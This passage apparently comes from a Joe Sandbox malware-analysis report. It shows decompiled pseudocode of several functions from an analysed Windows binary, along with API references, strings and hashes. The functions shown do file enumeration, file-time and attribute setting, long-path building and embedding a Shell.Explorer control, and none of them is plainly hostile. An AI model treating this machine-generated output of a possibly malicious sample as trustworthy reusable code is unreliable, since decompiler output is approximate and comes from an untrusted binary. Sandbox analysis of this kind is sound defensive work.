															}
														}
														asm("sbb eax, eax");
														_v344 =  ~(_t115 & 0x000000ff) & _t170 - _t155 + 0x00000001;
														E00BBF1A0(_t203,  &_v336, _t203, 0x140);
														_t228 = _t227 + 0xc;
														_t215 = FindFirstFileExA(_t155, _t203,  &_v336, _t203, _t203, _t203);
														_t123 = _v340;
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															_t174 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
															__eflags = _t174;
															_v348 = _t174 >> 2;
															do {
																__eflags = _v336.cFileName - 0x2e;
																if(_v336.cFileName != 0x2e) {
																	L64:
																	_push(_t123);
																	_push(_v344);
																	_t123 =  &(_v336.cFileName);
																	_push(_t155);
																	_push(_t123);
																	L28();
																	_t228 = _t228 + 0x10;
																	__eflags = _t123;
																	if(_t123 != 0) {
																		goto L54;
																	} else {
																		goto L65;
																	}
																} else {
																	_t178 = _v291;
																	__eflags = _t178;
																	if(_t178 == 0) {
																		goto L65;
																	} else {
																		__eflags = _t178 - 0x2e;
																		if(_t178 != 0x2e) {
																			goto L64;
																		} else {
																			__eflags = _v290;
																			if(_v290 == 0) {
																				goto L65;
																			} else {
																				goto L64;
																			}
																		}
																	}
																}
																goto L58;
																L65:
																_t128 = FindNextFileA(_t215,  &_v336);
																__eflags = _t128;
																_t123 = _v340;
															} while (_t128 != 0);
															_t195 =  *_t123;
															_t179 = _v348;
															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
															__eflags = _t179 - _t131;
															if(_t179 != _t131) {
																E00BC58F0(_t155, _t203, _t215, _t195 + _t179 * 4, _t131 - _t179, 4, E00BCA780);
															}
														} else {
															_push(_t123);
															_push(_t203);
															_push(_t203);
															_push(_t155);
															L28();
															L54:
															_t203 = _t123;
														}
														__eflags = _t215 - 0xffffffff;
														if(_t215 != 0xffffffff) {
															FindClose(_t215);
														}
													} else {
														__eflags = _t170 -  &(_t155[1]);
														if(_t170 ==  &(_t155[1])) {
															goto L47;
														} else {
															_push(_t214);
															_push(0);
															_push(0);
															_push(_t155);
															L28();
														}
													}
													L58:
													__eflags = _v16 ^ _t222;
													return E00BBEA8A(_v16 ^ _t222);
												} else {
													goto L34;
												}
											}
										} else {
											_t139 = 0xc;
											L36:
											return _t139;
										}
									} else {
										goto L22;
									}
									goto L68;
									L22:
									_t196 = _v16;
									 *((intOrPtr*)(_v24 + _t199)) = _t196;
									_t199 = _t199 + 4;
									_t192 = _t196 + _v12;
									_v16 = _t196 + _v12;
									__eflags = _t199 - _t151;
								} while (_t199 != _t151);
								goto L23;
							}
						} else {
							_t200 = _t199 | 0xffffffff;
							L24:
							E00BC835E(0);
							goto L25;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t160;
							_t147 = E00BCE6F0( *_t208,  &_v8);
							__eflags = _t147;
							if(_t147 != 0) {
								_push( &_v36);
								_push(_t147);
								_push( *_t208);
								L38();
								_t224 = _t224 + 0xc;
							} else {
								_t147 =  &_v36;
								_push(_t147);
								_push(0);
								_push(0);
								_push( *_t208);
								L28();
								_t224 = _t224 + 0x10;
							}
							_t200 = _t147;
							__eflags = _t200;
							if(_t200 != 0) {
								break;
							}
							_t208 = _t208 + 4;
							_t160 = 0;
							__eflags =  *_t208;
							if( *_t208 != 0) {
								continue;
							} else {
								_t151 = _v336.cAlternateFileName;
								_t199 = _v36;
								goto L9;
							}
							goto L68;
						}
						L25:
						E00BCAB42( &_v36);
						_t91 = _t200;
						goto L26;
					}
				} else {
					_t148 = E00BC87DA();
					_t219 = 0x16;
					 *_t148 = _t219;
					E00BC86B9();
					_t91 = _t219;
					L26:
					return _t91;
				}
				L68:
			}

0x00bca79d
0x00bca7a0
0x00bca7a6
0x00bca7be
0x00bca7c1
0x00bca7c5
0x00bca7c7
0x00bca7c9
0x00bca7cb
0x00bca7ce
0x00bca7d1
0x00bca7d4
0x00bca7d6
0x00bca82e
0x00bca82e
0x00bca834
0x00bca836
0x00bca841
0x00bca845
0x00bca847
0x00bca84a
0x00bca84e
0x00bca84e
0x00bca850
0x00bca852
0x00bca854
0x00bca856
0x00bca856
0x00bca858
0x00bca85b
0x00bca85e
0x00bca85e
0x00bca860
0x00bca861
0x00bca861
0x00bca86c
0x00bca86e
0x00bca871
0x00bca872
0x00bca875
0x00bca875
0x00bca879
0x00bca87c
0x00bca87f
0x00bca87f
0x00bca88d
0x00bca88f
0x00bca892
0x00bca894
0x00bca89e
0x00bca8a1
0x00bca8a4
0x00bca8a6
0x00bca8a9
0x00bca8ab
0x00bca8fb
0x00bca8fe
0x00bca8fe
0x00bca900
0x00000000
0x00bca8ad
0x00bca8af
0x00bca8af
0x00bca8b1
0x00bca8b4
0x00bca8b4
0x00bca8b9
0x00bca8bc
0x00bca8bc
0x00bca8be
0x00bca8bf
0x00bca8bf
0x00bca8c3
0x00bca8c6
0x00bca8c6
0x00bca8c9
0x00bca8cc
0x00bca8d9
0x00bca8de
0x00bca8e1
0x00bca8e3
0x00bca91d
0x00bca91e
0x00bca91f
0x00bca920
0x00bca921
0x00bca922
0x00bca927
0x00bca92b
0x00bca92d
0x00bca92e
0x00bca931
0x00bca931
0x00bca934
0x00bca934
0x00bca936
0x00bca937
0x00bca937
0x00bca940
0x00bca941
0x00bca944
0x00bca947
0x00bca94a
0x00bca94c
0x00bca953
0x00bca955
0x00bca958
0x00bca962
0x00bca965
0x00bca966
0x00bca968
0x00bca97c
0x00bca97c
0x00bca97f
0x00bca989
0x00bca98e
0x00bca991
0x00bca993
0x00000000
0x00bca995
0x00bca999
0x00bca9a2
0x00bca9a8
0x00000000
0x00bca9ab
0x00bca96a
0x00bca96a
0x00bca970
0x00bca975
0x00bca978
0x00bca97a
0x00bca9b1
0x00bca9b3
0x00bca9b4
0x00bca9b5
0x00bca9b6
0x00bca9b7
0x00bca9b8
0x00bca9bd
0x00bca9c0
0x00bca9c1
0x00bca9c3
0x00bca9c9
0x00bca9d0
0x00bca9d3
0x00bca9d6
0x00bca9d7
0x00bca9da
0x00bca9db
0x00bca9de
0x00bca9df
0x00bcaa00
0x00bcaa00
0x00bcaa02
0x00000000
0x00000000
0x00bca9e7
0x00bca9e9
0x00bca9eb
0x00bca9ed
0x00bca9ef
0x00bca9f1
0x00bca9f3
0x00bca9fe
0x00000000
0x00bca9fe
0x00bca9f3
0x00bca9ef
0x00000000
0x00bca9eb
0x00bcaa04
0x00bcaa06
0x00bcaa09
0x00bcaa22
0x00bcaa22
0x00bcaa24
0x00bcaa27
0x00bcaa37
0x00bcaa39
0x00bcaa39
0x00bcaa29
0x00bcaa29
0x00bcaa2c
0x00000000
0x00bcaa2e
0x00bcaa2e
0x00bcaa31
0x00000000
0x00bcaa33
0x00bcaa33
0x00bcaa33
0x00bcaa31
0x00bcaa2c
0x00bcaa47
0x00bcaa4b
0x00bcaa59
0x00bcaa5e
0x00bcaa73
0x00bcaa75
0x00bcaa7b
0x00bcaa7e
0x00bcaab0
0x00bcaab0
0x00bcaab5
0x00bcaabb
0x00bcaabb
0x00bcaac2
0x00bcaadc
0x00bcaadc
0x00bcaadd
0x00bcaae3
0x00bcaae9
0x00bcaaea
0x00bcaaeb
0x00bcaaf0
0x00bcaaf3
0x00bcaaf5
0x00000000
0x00000000
0x00000000
0x00000000
0x00bcaac4
0x00bcaac4
0x00bcaaca
0x00bcaacc
0x00000000
0x00bcaace
0x00bcaace
0x00bcaad1
0x00000000
0x00bcaad3
0x00bcaad3
0x00bcaada
0x00000000
0x00000000
0x00000000
0x00000000
0x00bcaada
0x00bcaad1
0x00bcaacc
0x00000000
0x00bcaaf7
0x00bcaaff
0x00bcab05
0x00bcab07
0x00bcab07
0x00bcab0f
0x00bcab14
0x00bcab1c
0x00bcab1f
0x00bcab21
0x00bcab35
0x00bcab3a
0x00bcaa80
0x00bcaa80
0x00bcaa81
0x00bcaa82
0x00bcaa83
0x00bcaa84
0x00bcaa8c
0x00bcaa8c
0x00bcaa8c
0x00bcaa8e
0x00bcaa91
0x00bcaa94
0x00bcaa94
0x00bcaa0b
0x00bcaa0e
0x00bcaa10
0x00000000
0x00bcaa12
0x00bcaa12
0x00bcaa15
0x00bcaa16
0x00bcaa17
0x00bcaa18
0x00bcaa1d
0x00bcaa10
0x00bcaa9c
0x00bcaaa1
0x00bcaaac
0x00000000
0x00000000
0x00000000
0x00bca97a
0x00bca94e
0x00bca950
0x00bca9ac
0x00bca9b0
0x00bca9b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00bca8e5
0x00bca8e8
0x00bca8eb
0x00bca8ee
0x00bca8f1
0x00bca8f4
0x00bca8f7
0x00bca8f7
0x00000000
0x00bca8b4
0x00bca896
0x00bca896
0x00bca902
0x00bca904
0x00000000
0x00bca909
0x00bca7d8
0x00bca7d8
0x00bca7db
0x00bca7e4
0x00bca7e7
0x00bca7ee
0x00bca7f0
0x00bca809
0x00bca80a
0x00bca80b
0x00bca80d
0x00bca812
0x00bca7f2
0x00bca7f2
0x00bca7f5
0x00bca7f6
0x00bca7f8
0x00bca7fa
0x00bca7fc
0x00bca801
0x00bca801
0x00bca815
0x00bca817
0x00bca819
0x00000000
0x00000000
0x00bca81f
0x00bca822
0x00bca824
0x00bca826
0x00000000
0x00bca828
0x00bca828
0x00bca82b
0x00000000
0x00bca82b
0x00000000
0x00bca826
0x00bca90a
0x00bca90d
0x00bca912
0x00000000
0x00bca915
0x00bca7a8
0x00bca7a8
0x00bca7af
0x00bca7b0
0x00bca7b2
0x00bca7b7
0x00bca916
0x00bca91a
0x00bca91a
0x00000000

APIs

_free.LIBCMT ref: 00BCA904

Part of subcall function 00BC86C9: IsProcessorFeaturePresent.KERNEL32(00000017,00BC86B8,0000002C,00BDAC20,00BCB8E6,00000000,00000000,00BC8EA8,?,?,00BC86C5,00000000,00000000,00000000,00000000,00000000), ref: 00BC86CB
Part of subcall function 00BC86C9: GetCurrentProcess.KERNEL32(C0000417,00BDAC20,0000002C,00BC83F6,00000016,00BC8EA8), ref: 00BC86ED
Part of subcall function 00BC86C9: TerminateProcess.KERNEL32(00000000), ref: 00BC86F4

Strings

*?, xrefs: 00BCA7DB
., xrefs: 00BCAABB

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free
String ID: *?$.
API String ID: 2667617558-3972193922
Opcode ID: 7862bbd4a364659598cbf5db2284bf22e5480a30c37370ad1f5e95b10fff7af4
Instruction ID: d9b2962c6343a0f8ed0cdeebf047bfaecb44ca1032c907bd78a74b5e44ac2ee8
Opcode Fuzzy Hash: 7862bbd4a364659598cbf5db2284bf22e5480a30c37370ad1f5e95b10fff7af4
Instruction Fuzzy Hash: 4D518F71E0010DAFDF14CFA8C881AADBBF5EF58314F2581AEE454E7341E6719E028B51

Uniqueness

Uniqueness Score: -1.00%

Function 00BA7704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138
timeCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00BA7704(void* __ecx, void* __edx) {
				void* __esi;
				char _t54;
				signed int _t57;
				void* _t61;
				signed int _t62;
				signed int _t68;
				signed int _t85;
				void* _t90;
				void* _t99;
				void* _t101;
				intOrPtr* _t106;
				void* _t108;

				_t99 = __edx;
				E00BBE0E4(E00BD1C30, _t108);
				E00BBE1C0();
				_t106 =  *((intOrPtr*)(_t108 + 0xc));
				if( *_t106 == 0) {
					L3:
					_t101 = 0x802;
					E00BAFD96(_t108 - 0x1014, _t106, 0x802);
					L4:
					_t81 =  *((intOrPtr*)(_t108 + 8));
					E00BA7907(_t106,  *((intOrPtr*)(_t108 + 8)), _t108 - 0x4080, 0x800);
					_t113 =  *((short*)(_t108 - 0x4080)) - 0x3a;
					if( *((short*)(_t108 - 0x4080)) == 0x3a) {
						__eflags =  *((char*)(_t108 + 0x10));
						if(__eflags == 0) {
							E00BAFD6E(__eflags, _t108 - 0x1014, _t108 - 0x4080, _t101);
							E00BA7098(_t108 - 0x3080);
							_push(0);
							_t54 = E00BAA406(_t108 - 0x3080, _t99, __eflags, _t106, _t108 - 0x3080);
							_t85 =  *(_t108 - 0x2078);
							 *((char*)(_t108 - 0xd)) = _t54;
							__eflags = _t85 & 0x00000001;
							if((_t85 & 0x00000001) != 0) {
								__eflags = _t85 & 0xfffffffe;
								E00BAA384(_t106, _t85 & 0xfffffffe);
							}
							E00BA95B6(_t108 - 0x2038);
							 *((intOrPtr*)(_t108 - 4)) = 1;
							_t57 = E00BA9E0F(_t108 - 0x2038, __eflags, _t108 - 0x1014, 0x11);
							__eflags = _t57;
							if(_t57 != 0) {
								_push(0);
								_push(_t108 - 0x2038);
								_push(0);
								_t68 = E00BA3B26(_t81, _t99);
								__eflags = _t68;
								if(_t68 != 0) {
									E00BA9670(_t108 - 0x2038);
								}
							}
							E00BA95B6(_t108 - 0x50a4);
							__eflags =  *((char*)(_t108 - 0xd));
							 *((char*)(_t108 - 4)) = 2;
							if( *((char*)(_t108 - 0xd)) != 0) {
								_t62 = E00BA9950(_t108 - 0x50a4, _t106, _t106, 5);
								__eflags = _t62;
								if(_t62 != 0) {
									SetFileTime( *(_t108 - 0x50a0), _t108 - 0x2058, _t108 - 0x2050, _t108 - 0x2048);
								}
							}
							E00BAA384(_t106,  *(_t108 - 0x2078));
							E00BA95E8(_t108 - 0x50a4, _t106);
							_t90 = _t108 - 0x2038;
						} else {
							E00BA95B6(_t108 - 0x60c8);
							_push(1);
							_push(_t108 - 0x60c8);
							_push(0);
							 *((intOrPtr*)(_t108 - 4)) = 0;
							E00BA3B26(_t81, _t99);
							_t90 = _t108 - 0x60c8;
						}
						_t61 = E00BA95E8(_t90, _t106);
					} else {
						E00BA7032(_t113, 0x53, _t81 + 0x1e, _t106);
						_t61 = E00BA6F5B(0xbdff50, 3);
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t108 - 0xc));
					return _t61;
				}
				_t112 =  *((intOrPtr*)(_t106 + 2));
				if( *((intOrPtr*)(_t106 + 2)) != 0) {
					goto L3;
				} else {
					_t101 = 0x802;
					E00BAFD96(_t108 - 0x1014, 0xbd2760, 0x802);
					E00BAFD6E(_t112, _t108 - 0x1014, _t106, 0x802);
					goto L4;
				}
			}

0x00ba7704
0x00ba7709
0x00ba7713
0x00ba771a
0x00ba7723
0x00ba7752
0x00ba7752
0x00ba7760
0x00ba7765
0x00ba7765
0x00ba7775
0x00ba777a
0x00ba7782
0x00ba77a1
0x00ba77a5
0x00ba77e2
0x00ba77ed
0x00ba77fa
0x00ba77fd
0x00ba7802
0x00ba7808
0x00ba780b
0x00ba780e
0x00ba7810
0x00ba7815
0x00ba7815
0x00ba7820
0x00ba782d
0x00ba783b
0x00ba7840
0x00ba7842
0x00ba7844
0x00ba784d
0x00ba784e
0x00ba784f
0x00ba7854
0x00ba7856
0x00ba785e
0x00ba785e
0x00ba7856
0x00ba7869
0x00ba786e
0x00ba7872
0x00ba7876
0x00ba7881
0x00ba7886
0x00ba7888
0x00ba78a5
0x00ba78a5
0x00ba7888
0x00ba78b2
0x00ba78bd
0x00ba78c2
0x00ba77a7
0x00ba77ad
0x00ba77b2
0x00ba77bc
0x00ba77bd
0x00ba77c0
0x00ba77c3
0x00ba77c8
0x00ba77c8
0x00ba78c8
0x00ba7784
0x00ba778b
0x00ba7797
0x00ba7797
0x00ba78d3
0x00ba78dd
0x00ba78dd
0x00ba7725
0x00ba7729
0x00000000
0x00ba772b
0x00ba772b
0x00ba773d
0x00ba774b
0x00000000
0x00ba774b

APIs

__EH_prolog.LIBCMT ref: 00BA7709
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00BA78A5

Part of subcall function 00BAA384: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA1BA,?,?,?,00BAA053,?,00000001,00000000,?,?), ref: 00BAA398
Part of subcall function 00BAA384: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA1BA,?,?,?,00BAA053,?,00000001,00000000,?,?), ref: 00BAA3C9

Strings

:, xrefs: 00BA777A

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: a2b6864033874534d754ffbfbfcabdb48e9587d80313c385b96e5c92b1e129c6
Instruction ID: eefe0f8f3b56acfa3f2e6ceca05a8bb414ef79fbd28e217fc04712e724c34282
Opcode Fuzzy Hash: a2b6864033874534d754ffbfbfcabdb48e9587d80313c385b96e5c92b1e129c6
Instruction Fuzzy Hash: 6B416D7184C258AADF25EB50CC89EEEB7FCEF46300F0040E9B509A6192DB745F89DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BAB5AC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00BAB5AC(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
				short _v4096;
				short _v4100;
				signed short* _t30;
				long _t32;
				short _t33;
				void* _t39;
				signed short* _t52;
				void* _t53;
				signed short* _t62;
				void* _t66;
				intOrPtr _t69;
				signed short* _t71;
				intOrPtr _t73;

				E00BBE1C0();
				_t71 = _a4;
				if( *_t71 != 0) {
					E00BAB746(_t71);
					_t66 = E00BC33F3(_t71);
					_t30 = E00BAB772(_t71);
					__eflags = _t30;
					if(_t30 == 0) {
						_t32 = GetCurrentDirectoryW(0x7ff,  &_v4100);
						__eflags = _t32;
						if(_t32 == 0) {
							L22:
							_t33 = 0;
							__eflags = 0;
							L23:
							goto L24;
						}
						__eflags = _t32 - 0x7ff;
						if(_t32 > 0x7ff) {
							goto L22;
						}
						__eflags = E00BAB84D( *_t71 & 0x0000ffff);
						if(__eflags == 0) {
							E00BAB147(__eflags,  &_v4100, 0x800);
							_t39 = E00BC33F3( &_v4100);
							_t69 = _a12;
							__eflags = _t69 - _t39 + _t66 + 4;
							if(_t69 <= _t39 + _t66 + 4) {
								goto L22;
							}
							E00BAFD96(_a8, L"\\\\?\\", _t69);
							E00BAFD6E(__eflags, _a8,  &_v4100, _t69);
							__eflags =  *_t71 - 0x2e;
							if(__eflags == 0) {
								__eflags = E00BAB84D(_t71[1] & 0x0000ffff);
								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E00BAFD6E(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E00BAFD96(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E00BAFD6E(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E00BAB746(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E00BAFD96(_a8, L"\\\\?\\", _t73);
						E00BAFD6E(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E00BAFD96(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x00bab5b4
0x00bab5ba
0x00bab5c1
0x00bab5cd
0x00bab5da
0x00bab5dc
0x00bab5e1
0x00bab5e3
0x00bab669
0x00bab66f
0x00bab671
0x00bab730
0x00bab730
0x00bab730
0x00bab732
0x00000000
0x00bab733
0x00bab677
0x00bab679
0x00000000
0x00000000
0x00bab688
0x00bab68a
0x00bab6cf
0x00bab6db
0x00bab6e5
0x00bab6e9
0x00bab6eb
0x00000000
0x00000000
0x00bab6f6
0x00bab706
0x00bab70b
0x00bab70f
0x00bab71b
0x00bab71d
0x00bab71f
0x00bab71f
0x00bab71f
0x00bab71d
0x00bab722
0x00bab722
0x00bab723
0x00bab723
0x00bab724
0x00bab724
0x00bab727
0x00bab72c
0x00000000
0x00bab72c
0x00bab68c
0x00bab68f
0x00bab692
0x00bab694
0x00000000
0x00000000
0x00bab6a3
0x00bab6aa
0x00bab6bc
0x00000000
0x00bab6bc
0x00bab5e6
0x00bab5eb
0x00bab5ed
0x00bab615
0x00bab616
0x00bab619
0x00000000
0x00000000
0x00bab61f
0x00bab622
0x00bab625
0x00000000
0x00000000
0x00bab62b
0x00bab62e
0x00bab631
0x00bab633
0x00000000
0x00000000
0x00bab642
0x00bab650
0x00bab655
0x00bab656
0x00000000
0x00bab656
0x00bab5ef
0x00bab5f2
0x00bab5f5
0x00000000
0x00000000
0x00bab606
0x00bab60b
0x00000000
0x00bab5c3
0x00bab5c3
0x00bab734
0x00bab738
0x00bab738

Strings

UNC, xrefs: 00BAB648
\\?\, xrefs: 00BAB5FE, 00BAB63A, 00BAB69B, 00BAB6EE

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 3b3ec02cb3c1d23069f51613f66a8d254fb8782155126a207402dedf12016a5b
Instruction ID: afcdcb67b1c9da62879b1cd2ceacb8bcceba9ccdce40276019a3443417972370
Opcode Fuzzy Hash: 3b3ec02cb3c1d23069f51613f66a8d254fb8782155126a207402dedf12016a5b
Instruction Fuzzy Hash: AB418231508259AACB21AF60DC81EFE77E9EF97350F1040E6F87497152EBB1DD509660

Uniqueness

Uniqueness Score: -1.00%

Function 00BB8F06 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00BB8F06(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t58;

				_t50 = __edi;
				_t34 = _t35;
				_t53 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t53;
				_t21 = E00BBE0A0(__edx, _t53, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E00BB875E(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t53;
					E00BB977F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E00BB99DE();
					E00BB9974( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E00BB9871( *((intOrPtr*)(_t34 + 0xc)));
					_t58 = _t26;
					if(_t58 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E00BB8976(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t54 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0xbd2260(_t28);
							_t26 =  *((intOrPtr*)(_t54 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0xbd2260(_t58, 0xbd43fc, _t30, _t50);
					_t32 =  *((intOrPtr*)( *( *_t58)))();
					 *0xbd2260(_t58);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}

0x00bb8f06
0x00bb8f08
0x00bb8f0b
0x00bb8f11
0x00bb8f14
0x00bb8f19
0x00bb8f20
0x00bb8f2b
0x00bb8f2b
0x00bb8f22
0x00bb8f24
0x00bb8f24
0x00bb8f2d
0x00bb8f32
0x00bb8fe5
0x00bb8f38
0x00bb8f39
0x00bb8f44
0x00bb8f4c
0x00bb8f4e
0x00bb8f58
0x00bb8f60
0x00bb8f65
0x00bb8f69
0x00bb8faa
0x00bb8faa
0x00bb8fae
0x00bb8fb2
0x00bb8fb7
0x00bb8fbc
0x00bb8fbf
0x00bb8fc0
0x00bb8fc3
0x00bb8fc5
0x00bb8fc6
0x00bb8fc7
0x00bb8fcb
0x00bb8fd2
0x00bb8fcd
0x00bb8fcd
0x00bb8fcd
0x00bb8fd8
0x00bb8fde
0x00bb8fde
0x00bb8fe1
0x00000000
0x00bb8fe1
0x00bb8f6e
0x00bb8f6e
0x00bb8f7d
0x00bb8f81
0x00bb8f87
0x00bb8f94
0x00bb8f9a
0x00bb8f9f
0x00000000
0x00000000
0x00bb8fa1
0x00bb8fa5
0x00000000
0x00bb8fa5

APIs

new.LIBCMT ref: 00BB8F14

Strings

Shell.Explorer, xrefs: 00BB8F3F
about:blank, xrefs: 00BB8FD2

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
